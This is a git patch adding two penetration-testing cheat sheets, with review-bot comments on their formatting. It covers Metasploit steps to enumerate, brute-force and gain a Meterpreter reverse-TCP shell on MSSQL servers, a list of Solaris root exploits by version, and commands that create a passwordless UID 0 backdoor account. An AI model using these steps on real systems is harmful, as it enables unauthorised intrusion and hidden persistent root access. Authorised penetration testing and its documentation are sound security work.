From 94848eb0f04bb8e1855e2b5481620df40fba2010 Mon Sep 17 00:00:00 2001 From: JShaw Date: Thu, 11 Sep 2014 21:42:33 +0100 Subject: [PATCH] Added AttackingMSSQL and Solaris Cheatsheets Added AttackingMSSQL and Solaris Cheatsheets --- Cheatsheet_AttackingMSSQL.txt | 21 +++++++++++++++++++ Cheatsheet_Solaris.txt | 38 +++++++++++++++++++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 Cheatsheet_AttackingMSSQL.txt create mode 100644 Cheatsheet_Solaris.txt diff --git a/Cheatsheet_AttackingMSSQL.txt b/Cheatsheet_AttackingMSSQL.txt new file mode 100644 index 0000000..ce91b46 --- /dev/null +++ b/Cheatsheet_AttackingMSSQL.txt @@ -0,0 +1,21 @@ +[+] Attacking MSSQL with Metasploit + +[>] Enumerate MSSQL Servers on the network: + +msf > use auxiliary/scanner/mssql/mssql_ping +nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 +Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. + +[>] Bruteforce MSSQL Database: + +msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login + +[>] Enumerate MSSQL Database: + +msf > use auxiliary/admin/mssql/mssql_enum + +[>] Gain shell using gathered credentials + +msf > use exploit/windows/mssql/mssql_payload +msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp + diff --git a/Cheatsheet_Solaris.txt b/Cheatsheet_Solaris.txt new file mode 100644 index 0000000..c5b9dfb --- /dev/null +++ b/Cheatsheet_Solaris.txt 
@@ -0,0 +1,38 @@ +[+] Solaris vulnerabilities: + +Solaris 7: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client +sendmail_exec LPD - line printer daemon buffer overflow - allows root +heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +Solaris 8: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client +sendmail_exec LPD - line printer daemon buffer overflow - allows root +heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. +no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +solaris 9: +sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. +sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. +kcms_readfile kcms / ttdbserverd remote file read (only in msf2) + +Solaris 10: +fuser TELNET - authentication bypass through -f command - can be manually exploited +ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. + +Solaris 11: +fuser TELNET - authentication bypass through -f command - can be manually exploited + +[+] Adding solaris user: + +useradd -u 0 -o pentestuser +passwd -d pentestuser + +[+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. \ No newline at end of file
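Review bot: In the Cheatsheet_AttackingMSSQL.txt hunk the bruteforce entry shows the prompt `msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login`, i.e. the module appears already selected before the `use` command that selects it; every other entry uses the bare `msf >` prompt, so this should read `msf > use auxiliary/scanner/mssql/mssql_login`. The level of detail is also uneven: mssql_login and mssql_enum stop at `use`, while the mssql_payload entry goes on to `set PAYLOAD windows/meterpreter/reverse_tcp`; pick one depth for all entries so a reader knows whether each line is complete. `Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.` is a GUI instruction sitting among shell lines and should carry a `[>]` or comment marker so it is not mistaken for a command, and the hunk ends with an empty `+` line, leaving a trailing blank line in the new file.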
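Review bot: In the Cheatsheet_Solaris.txt hunk the markers used in the vulnerability list are never explained: `**ttyprompt TELNET - buffer overflow in solaris login` carries a double asterisk with no legend, `no exploit - sadmind_adm_build_path` is qualified under Solaris 8 but the same item is listed without the qualifier under Solaris 9, and `(only in msf2)` is repeated without saying what it refers to; a short legend at the top of the file would resolve all three. Headings are inconsistently capitalised (`solaris 9:` versus `Solaris 7:`). The `[+] Adding solaris user:` section, `useradd -u 0 -o pentestuser` followed by `passwd -d pentestuser`, creates a second UID 0 account with an empty password, a change that stands out in any /etc/passwd and /etc/shadow audit; the sheet should note that this is an engagement artifact to record and remove at the end of testing, since a passwordless root-equivalent login left on a host is itself a finding. The file also lacks a trailing newline (`\ No newline at end of file`).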